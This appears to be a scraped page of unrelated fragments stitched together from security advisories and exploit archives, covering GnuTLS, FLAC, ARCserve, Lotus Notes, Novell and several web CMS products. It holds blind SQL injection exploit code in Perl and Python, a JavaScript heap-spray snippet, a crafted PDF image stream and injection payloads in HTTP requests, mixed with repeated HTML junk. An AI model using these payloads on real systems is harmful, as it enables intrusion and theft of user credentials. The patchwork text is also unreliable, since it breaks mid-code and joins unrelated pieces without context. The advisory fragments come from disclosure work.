Next Page >>
width
Hash: SHA1
Mu Dynamics, Inc. Security Advisories MU-201202-01 and MU-201202-02 for GnuTLS and Libtasn1
TLS record handling vulnerability in GnuTLS [MU-201202-01]
ASN.1 length decoding vulnerability in Libtasn1 [MU-201202-02]
20 March 2012
http://blog.mudynamics.com/2012/03/20/gnutls-and-libtasn1-vulns/
http://labs.mudynamics.com/advisories.html
by user inter-action (remote) via request force ...
Code Review: Networks Definition
<tr><td style="width: 72px; vertical-align: top;" valign="top"><img class="TABLEOBJITEM_BUTTON_edit" src="core/img/blank1x1.gif"><span>
</span><img class="TABLEOBJITEM_BUTTON_clone" src="core/img/blank1x1.gif"><img style="width: 72px; height: 1px;" src="core/img/blank1x1.gif">
<img style="padding: 2px; cursor: pointer;" src="wfe/acc/img/buttons/button_custom_delete.png"><img style="padding: 2px; cursor: pointer;
display: none;" src="wfe/acc/img/buttons/button_custom_info.png"></td><td style="vertical-align: top; padding: 2px;" valign="top"><table style=
"width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="padding-top: 2px;" id="global_object_td_REF_ACC_GBL_
16fe7d084bbe4b05b7f25b74e5d18aa98aa9"><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="padding-right: 4px; width: 16px;">
by user inter-action (remote) via request force ...
Code Review: Networks Definition
<tr><td style="width: 72px; vertical-align: top;" valign="top"><img class="TABLEOBJITEM_BUTTON_edit" src="core/img/blank1x1.gif"><span>
</span><img class="TABLEOBJITEM_BUTTON_clone" src="core/img/blank1x1.gif"><img style="width: 72px; height: 1px;" src="core/img/blank1x1.gif">
<img style="padding: 2px; cursor: pointer;" src="wfe/acc/img/buttons/button_custom_delete.png"><img style="padding: 2px; cursor: pointer;
display: none;" src="wfe/acc/img/buttons/button_custom_info.png"></td><td style="vertical-align: top; padding: 2px;" valign="top"><table style=
"width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="padding-top: 2px;" id="global_object_td_REF_ACC_GBL_
16fe7d084bbe4b05b7f25b74e5d18aa98aa9"><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="padding-right: 4px; width: 16px;">
+/* This is at least as big as the largest possible instructions
+ section: in theory, the instructions could be SVN_DELTA_WINDOW_SIZE
+ 1-byte copy-from-source instructions (though this is very unlikely). */
+#define MAX_INSTRUCTION_SECTION_LEN (SVN_DELTA_WINDOW_SIZE*MAX_INSTRUCTION_LEN)
/* Encode VAL into the buffer P using the variable-length svndiff
integer format. Return the incremented value of P after the
- encoded bytes have been written.
+ encoded bytes have been written. P must point to a buffer of size
+ at least MAX_ENCODED_INT_LEN.
bool ipcomp_encapsulate_data(void *data,
size_t size,
int nxt,
struct ipcomp **out,
size_t *length,
int level)
{
struct ipcomp *ipcomp;
z_stream zstream;
DHCPv6
Message type: Reply (7)
Transaction-ID: 0x007f1ea5
Server Identifier
option type: 2
option length: 10
DUID type: link-layer address (3)
Hardware type: Ethernet (1)
Link-layer address: 50:48:49:4f:4e:53
Client Identifier
option type: 1
Benchmarking attacks and major security weakness on all recent Windows versions up to Windows 2008
----------------------------------------------------------------------------------------------------
+ Author: Fabien KERBOUCI
+ Version/Date: 27/01/2009
+ Keywords: [ benchmark timing benchmarking attacks Windows runas vulnerability password length ]
Get a more detailed version of this advisory with complete tutorial and video in Haking9 Magazine
of May 2009.
====================================================================================================
-----------------
Python-2.5.2/Modules/zlibmodule.c:
761 PyDoc_STRVAR(decomp_flush__doc__,
762 "flush( [length] ) -- Return a string containing any remaining\n"
763 "decompressed data. length, if given, is the initial size of the\n"
764 "output buffer.\n"
765 "\n"
766 "The decompressor object can no longer be used after this call.");
767
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}
void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;
if( ! length ) return;
error handlers of the affected application. Exploitation would be
achieved by overwriting pointers in memory with arbitrary values stored
inside the FLAC file or hard coded addresses in DLL files that directing
code execution toward the attacker's payload.
Vulnerability #3: VORBIS Comment String Size Length Stack Overflow
This is due to predetermined buffer sizes in applications when handling
data in the VORBIS Comment Metadata block. By inserting an overly long
VORBIS Comment data string along with an large VORBIS Comment data
string size value (such as 0x000061A8 followed by 25,050 A's),
applications that do not properly apply boundary checks will result in a
addr = net_addr(at);
if( addrcmp( (void *) addr, (void *) &unspec_addr, af ) != 0 ) {
name = dns_lookup(addr); [1]
if(name != NULL) {
/* May be we should test name's length */ [!!]
sprintf(newLine, "%s %d %d %d %d %d %d", name, [2]
net_loss(at),
net_returned(at), net_xmit(at),
net_best(at) /1000, net_avg(at)/1000,
net_worst(at)/1000);
unsigned short afn; /* NHRP AFN */
unsigned short proto; /* NHRP protocol type */
unsigned int snap; /* NHRP SNAP */
unsigned short snapE:8; /* NHRP SNAP */
unsigned short hops:8; /* NHRP hop count */
unsigned short length; /* NHRP total length */
unsigned short checksum; /* NHRP checksum */
unsigned short mpoa_ext; /* NHRP MPOA extensions */
unsigned short version:8; /* NHRP version */
unsigned short type:8; /* NHRP type */
unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */
char *asciivalue; /* formatted double pointer */
int flags; /* formatting options */
int pad_char; /* padding character */
int pad_size; /* pad size */
int width; /* field width */
int left_prec; /* left precision */
int right_prec; /* right precision */
double value; /* just value */
char space_char = ' '; /* space after currency */
print "\t[###] [PATH]: Home Path.\n";
print "\t[###] [DBPREFIX]: Database Prefix. Default: lc_ (**optional)\n";
print "\t[###] [id]: Id user. Default: 1 (**optional)\n";
print "\t[###] Example: perl $0 'www.example.es' 'tematres1.03' 'lc_' '1'\n";
}
sub lengthcolumns{
#First, user length...
$exit=0;
$i=0;
while($exit==0){
my $blindsql=$_[0]."1'+AND+(SELECT+length(".$_[3].")+FROM+".$_[2]."usuario+WHERE+id=".$_[1].")=".$i++."/*"; #injected code
ADD URL: http://dhtmlx.com/docs/products/demoApps/dhtmlxDBAdmin/connection.html?etc=1333992780435
Vulnerable: Input Servername & Username - Listing
<tbody><tr style="display: none;"><td class="hiddenRow"><div style="padding: 0pt; margin: 0pt; width: 18px; height: 18px;">
</div></td><td style="display: none;" width="20px"><div style="width: 16px; height: 16px;"></div></td><td style="width: 18px;
" class="standartTreeImage"><div style="padding: 0pt; margin: 0pt; width: 18px; height: 18px;"></div></td><td style="width:
100%; font-size: 10pt; cursor: pointer;" class="standartTreeRow" nowrap="nowrap"><span style="padding-left: 5px; padding-right:
5px;" class="standartTreeRow"></span></td></tr><tr style=""><td> </td><td colspan="3"><table style="margin: 0pt; padding: 0pt;"
border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="standartTreeImage"><img src="./imgs/tree/plus4.gif" style="
ARCserve L&D uses TCP/1900 as its "RPC" interface to manage ARCserve L&D
servers. An example of sample benign traffic follows:
0000000027rxrLogin~~administrator
---------------------------------------------
Field 1: 10-digit base10 command length field ("0000000027")
Field 2: RPC command ("rxrLogin")
Field 3: Constant Argument Delimiter ("~~")
Field 4: Argument ("administrator")
Vulnerability #1: Authentication Username Overflow
Modifications to the file vmw/src/vmshf.c:
/-----------
static void ReplaceDelim(char *str, uint32_t length, char delim)
{
~ while (length--) {
~ if (*(str + length) == '\0' || *(str + length) == '/' ||
~ *(str + length) == '\\') {
Notes uses a third-party library [2] to process file attachments in the
Lotus Worksheet File format (WKS).
A worksheet file in WKS format is simply a binary representation of the
spreadsheet built using a sequence of binary records in the TLV form
(Type-Length-Value) where both Type and Length are encoded using two bytes.
There are multiple vulnerabilities in the way the Verity KeyView SDK DLL
processes the TLV records of a worksheet file. These vulnerabilities stem
from lack of proper consistency checks for the stated Length and the
corresponding Value in several record Types.
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n"
sys.exit()
def brute_length(urlrequest, idadmin, mail):
#Username length
flag=1
i=0
while(flag==1):
i=i+1
The procedure is very simple, sending several times a simple GET
HTTP/1.1 request to the victim URL will make the proxies no longer
serve it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which depending on the user agent it will
be interpreted as a valid zero-length HTTP 0.9 reply or an error.
It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor
http://www.google.com/whatever neither. However, it is clear enough
Function real_get_rdt_chunk() calls rtsp_read_data() to read RDT
(Real Data Transport) chunks headers from the network and after that it will
parse them.
A controled variable is used to allocate a buffer and later passed on to the
rtsp_read_data() function in order to specify the length of an RDT chunk
data to read from the network.
An integer underflow can be triggered when parsing a malformed RDT header chunk,
a remote attacker can exploit it to execute arbitrary code in the context of
the application.
ftf4 release before August, but this release was not confirmed yet
(see the timeline for more details). In the meantime, users can
mitigate these flaws by applying these countermeasures:
1. For [CVE-2010-1929 | 40480], establish a Web Application
Firewall rule for limiting the length of the parameters
'EnteredClassID' and 'NewClassName' in POST requests to the URI
'/nps/servlet/webacc/'.
2. For [CVE-2010-1930 | 40485], establish a Web Application
Firewall rule for limiting the length of the parameter 'Tree' in POST
requests to the URI '/nps/servlet/webacc/'.
#Keep-Alive: 300
#Proxy-Connection: keep-alive
#Referer: http://www.onlinegrades.org/demo/parents/parents.php?func=showreportcard
#Cookie: SESS82c464aff4a6373c38ca1d81df10661e=li1lag4844furho010a5ok8uq7; PHPSESSID=2ofepluotebqj7qu009qskaeg7
#Content-Type: application/x-www-form-urlencoded
#Content-length: 72
#TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101'+AND+1=1# --> TRUE
#TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101'+AND+1=0# --> FALSE
#
#######################################################################
#######################################################################
attach_info_packet = ('\xfb\x00\x00\x00\x00'
'BINAmdos'
'\xc2\x12\x49\xaf\xbd\x35\xac\x98'
'\x00\x00\x00\x00'
'%(attachment_length)s'
'\x00\x00\x00\x00'
'\xff\xff\xff\xff\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00'
'%(attachment_filename)s'
206 case FLAC_VORBIS_COMMENT:
207 {
208 /* For a description of the format please have a look at */
209 /* http://www.xiph.org/vorbis/doc/v-comment.html */
210
211 uint32_t length, comment_list_len;
212 (1) char comments[blk_len];
213 uint8_t *ptr = comments;
214 char *comment;
215 int cn;
216 char c;
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
print "\t[<-->] [PATH]: Home Path.\n";
print "\t[<-->] [Search]: Something. Default: a (**optional)\n";
print "\t[<-->] [id]: Id user. Default: 1 (**optional)\n";
print "\t[<-->] Example: perl $0 'www.example.es' 'leap-CMS' 'a' '1'\n";
}
sub lengthuser{
#First, user length...
$exit=0;
$i=0;
while($exit==0){
my $searchinjected="searchterm=".$_[2]."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/(SELECT/*y3nh4ck3r*/length(mail)/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id=".$_[1].")=".$i++."#"; #injected code
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 0 >>
stream
GarPPGWE%h$j7l8U/<b)7aWX$5Y7NE=r1HcE+b-(;)F/"d9oEm?)I\-b23C~>endstream
TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004
CVE no -
CVE-2012-1456
39. If the length field in the header of a file with test EICAR virus
included into a TAR archive is set to be greater than the archive's total
length (1,000,000+original length in our experiments), the antivirus
declares the file to be clean but virus gets extracted correctly by the
GNU tar program.
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path.\n";
print "\t[XxX] [id]: Id user. Default: 1 (**optional)\n";
print "\t[XxX] Example: perl $0 'www.example.es' 'wysgui_1.2' '1'\n";
}
sub lengthuser{
#First, user length...
$exit=0;
$i=0;
while($exit==0){
my $insec_cookie='admin_pages=about" AND (SELECT length(user) from users WHERE ID='.$_[1].')='.$i++.' /*';
Next Page>>
|
